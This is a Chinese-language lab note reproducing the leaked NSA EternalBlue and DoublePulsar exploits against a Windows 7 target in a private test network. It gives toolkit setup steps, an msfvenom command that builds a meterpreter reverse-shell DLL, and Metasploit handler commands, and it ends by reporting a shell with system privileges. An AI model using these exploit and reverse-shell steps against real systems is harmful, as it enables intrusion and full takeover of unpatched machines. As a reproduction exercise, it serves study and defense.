NSA工具包之0day Eternalblue 复现笔记。

NSA工具包之0day Eternalblue 复现笔记。

0x1 准备工作

工具包简介
python-2.6.6_x_32.msi
pywin32-221.win-amd64-py2.6.exe
方程式Eternalblue

0x2 环境搭建

Win2003攻击机 IP:192.168.59.131
说明
Kali攻击机 IP:192.168.59.132
说明
Win7靶机 IP:192.168.59.130
说明
查看靶机端口,需确保445端口开启。
说明
将下载好的文件解压后把windows目录拷贝到2003中,在windows目录中新建listeningposts文件夹,免去修改代码。
说明

0x3测试流程

在C:\shadowbroker-master\windows 中执行fb.py
说明
分别设置攻击IP地址192.168.59.130 ,回调地址192.168.59.131,关闭重定向,设置日志路径。
说明
查看可用模块。
说明
接下来输入命令use Eternalblue。
依次填入相关参数,超时时间等默认参数可以直接回车。
说明
由于靶机是win7 系统
在目标系统信息处选择1:win72k8r2
模式选1:FB
说明
确认信息,执行,最后可见Succeeded,执行成功。
说明
接下来在kali系统中,利用msf生成一个dll劫持文件,并将go.dll文件拷贝到windows2003的C盘目录下:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.59.132 LPORT=5555 -f dll > go.dll
说明
在msf下开启msfpaylod监听
use exploit/multi/handler
set lhost 192.168.0.27
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
说明
接下来继续在windows2003上执行use Doublepulsar。
说明
根据提示选择对应系统,设置dll文件路径,运行dll文件。
说明
说明
最后在MSF中可以看到,成功反弹shell,拿到系统权限。
说明
说明

参考文章:

https://bbs.ichunqiu.com/thread-21745-1-1.html
http://www.91ri.org/16936.html